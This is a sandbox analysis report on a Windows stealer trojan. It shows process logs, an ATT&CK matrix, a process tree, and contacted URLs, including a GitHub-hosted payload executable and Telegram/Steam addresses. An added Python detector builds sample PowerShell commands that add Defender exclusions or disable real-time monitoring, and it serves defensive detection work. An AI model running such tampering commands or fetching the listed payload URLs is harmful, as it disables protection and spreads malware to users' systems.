Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00431442 GetUserNameA,14_2_00431442
Source: C:\Users\user\Desktop\YYjRtxS70h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK matrix (one line per tactic, cells listed top to bottom; a number in parentheses is the count the report shows next to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1); HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Query Registry (1); Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1579768; Sample: YYjRtxS70h.exe; Start date: 23/12/2024; Architecture: WINDOWS; Score: 88

Process tree and network activity recovered from the behavior graph (remote port first, then the local ports used, then the AS label and country as the report prints them):

Start node: resolves t.me, steamcommunity.com and 2 other IPs or domains. Signatures on the sample: Multi AV Scanner detection for submitted file; Machine Learning detection for sample; PE file has a writeable .text section; 3 other signatures.

YYjRtxS70h.exe (started)
  Contacts: github.com 20.233.83.145, port 443, local port 49708, MICROSOFT-CORP-MSN-AS-BLOCKUS United States; raw.githubusercontent.com 185.199.110.133, port 443, local port 49709, FASTLYUS Netherlands
  Drops: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe (PE32); C:\Users\user\AppData\...\YYjRtxS70h.exe.log (CSV)
  Signature: Adds a directory exclusion to Windows Defender
  Starts: powershell.exe (three instances); 2 other processes

  powershell.exe (first instance)
    Signature: Adds a directory exclusion to Windows Defender
    Starts: powershell.exe (Signature: Loading BitLocker PowerShell Module); conhost.exe, which in turn starts WmiPrvSE.exe
  powershell.exe (second instance)
    Starts: powershell.exe; conhost.exe, which in turn starts conhost.exe
  powershell.exe (third instance)
    Starts: powershell.exe; conhost.exe

  2 other processes
    Contacts: 37.27.43.98, port 443, local ports 49712 and 49716, UNINETAZ Iran (ISLAMIC Republic Of); t.me 149.154.167.99, port 443, local ports 49710 and 49714, TELEGRAMRU United Kingdom; steamcommunity.com 104.102.49.254, port 443, local ports 49711 and 49715, AKAMAI-ASUS United States
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
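The process tree above shows the sample launching PowerShell children that carry the signature "Adds a directory exclusion to Windows Defender". The script below is an added detection example; it is not part of the Joe Sandbox report and not code from the sample. It takes process-creation command lines, decodes any -EncodedCommand argument (PowerShell expects base64 over the UTF-16LE script text), follows nested [Convert]::FromBase64String literals one layer deeper, and flags Add-MpPreference / Set-MpPreference calls that add an exclusion or disable a protection. The four command lines, the path C:\Users\Public\stage and the cmdlet arguments in it are constructed for the example and are not taken from the report.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# ---- constructed sample data -------------------------------------------------
# The command lines below are built for this example; none of them are taken
# from the sandbox report.  The excluded path and the cmdlet arguments are
# invented.

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it:
    base64 over the UTF-16LE bytes of the script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    # 1. benign: encoded, but touches nothing in Defender
    "powershell.exe -NoProfile -EncodedCommand "
    + encode_ps("Get-Process | Select-Object -First 3"),
    # 2. directory exclusion added behind the short -enc alias
    "powershell.exe -w hidden -enc "
    + encode_ps('Add-MpPreference -ExclusionPath "C:\\Users\\Public\\stage"'),
    # 3. cmdlet hidden one layer deeper: the script base64-decodes the cmdlet
    #    text at run time and hands it to Invoke-Expression
    "powershell.exe -ep bypass -e "
    + encode_ps(
        "$c=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
        + base64.b64encode(b"Set-MpPreference -DisableRealtimeMonitoring $true").decode("ascii")
        + "'));iex $c"
    ),
    # 4. plain text, no encoding at all: caught by the cmdlet pattern alone
    "powershell.exe Add-MpPreference -ExclusionProcess explorer.exe",
]

# ---- detection logic ----------------------------------------------------------
# -e, -ec, -enc, -encoded and -encodedcommand are all accepted by powershell.exe
ENCODED_ARG = re.compile(
    r"(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
INNER_B64 = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)", re.IGNORECASE)
# one MpPreference invocation, up to the next pipe, semicolon or line break
MPPREF = re.compile(r"\b(?:Add|Set|Remove)-MpPreference\b[^\r\n|;]*", re.IGNORECASE)
# arguments that widen exclusions or switch a protection off
TAMPER_ARGS = re.compile(
    r"-(?:Exclusion(?:Path|Extension|Process|IpAddress)|Disable\w+)", re.IGNORECASE)


def bytes_to_text(raw: bytes) -> Optional[str]:
    """Decode a base64 payload as UTF-16LE when it looks like UTF-16LE
    (a NUL in most odd byte positions), otherwise as UTF-8."""
    codec = "utf-16-le" if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4 else "utf-8"
    try:
        return raw.decode(codec)
    except UnicodeDecodeError:
        return None


def decode_layers(blob: str, max_depth: int = 3) -> List[str]:
    """Return the script layers hidden in a base64 blob: the blob itself and
    any FromBase64String() literals found inside the decoded text."""
    layers: List[str] = []
    pending = [blob]
    while pending and len(layers) < max_depth:
        try:
            raw = base64.b64decode(pending.pop(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, skip this candidate
        text = bytes_to_text(raw)
        if text is None:
            continue
        layers.append(text)
        pending.extend(m.group(1) for m in INNER_B64.finditer(text))
    return layers


def scan_command_line(cmd: str) -> Dict[str, object]:
    """Classify one command line: every recovered layer is searched for an
    MpPreference call whose arguments add an exclusion or disable a feature."""
    blobs = [m.group(1) for m in ENCODED_ARG.finditer(cmd)]
    blobs += [m.group(1) for m in INNER_B64.finditer(cmd)]
    layers = [cmd]
    for blob in blobs:
        layers.extend(decode_layers(blob))
    finding = None
    for layer in layers:
        for hit in MPPREF.finditer(layer):
            if TAMPER_ARGS.search(hit.group(0)):
                finding = hit.group(0).strip()
                break
        if finding:
            break
    return {"command_line": cmd, "layers": layers, "finding": finding}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the records that contain a Defender-tampering cmdlet."""
    return [r for r in (scan_command_line(line) for line in lines) if r["finding"]]


if __name__ == "__main__":
    for record in scan_logs(SAMPLE_COMMAND_LINES):
        print(record["finding"])
</test>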

Antivirus detection, submitted file
Source: YYjRtxS70h.exe; Detection: 62%; Scanner: Virustotal
Source: YYjRtxS70h.exe; Detection: 66%; Scanner: ReversingLabs; Label: ByteCode-MSIL.Trojan.Stealerc
Source: YYjRtxS70h.exe; Detection: 100%; Scanner: Joe Sandbox ML

Antivirus detection, dropped file
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Detection: 100%; Scanner: Joe Sandbox ML
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe; Detection: 63%; Scanner: ReversingLabs; Label: Win32.Trojan.Vigorf
No Antivirus matches
No Antivirus matches
No Antivirus matches
Contacted domains (Name; IP; Active; Malicious; Reputation; no antivirus detection for any entry)
steamcommunity.com; 104.102.49.254; Active: true; Malicious: false; Reputation: high
github.com; 20.233.83.145; Active: true; Malicious: false; Reputation: high
raw.githubusercontent.com; 185.199.110.133; Active: true; Malicious: false; Reputation: high
t.me; 149.154.167.99; Active: true; Malicious: false; Reputation: high

Contacted URLs (Name; Malicious; Reputation; no antivirus detection for any entry)
https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe; Malicious: false; Reputation: high
https://steamcommunity.com/profiles/76561199804377619; Malicious: false; Reputation: high
https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe; Malicious: false; Reputation: high
https://t.me/m3wm0w; Malicious: false; Reputation: high
URLs found in memory and dropped files (Name; Source; Malicious; Reputation; no antivirus detection for any entry; several names are cut short where the string in memory ends)
Name: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
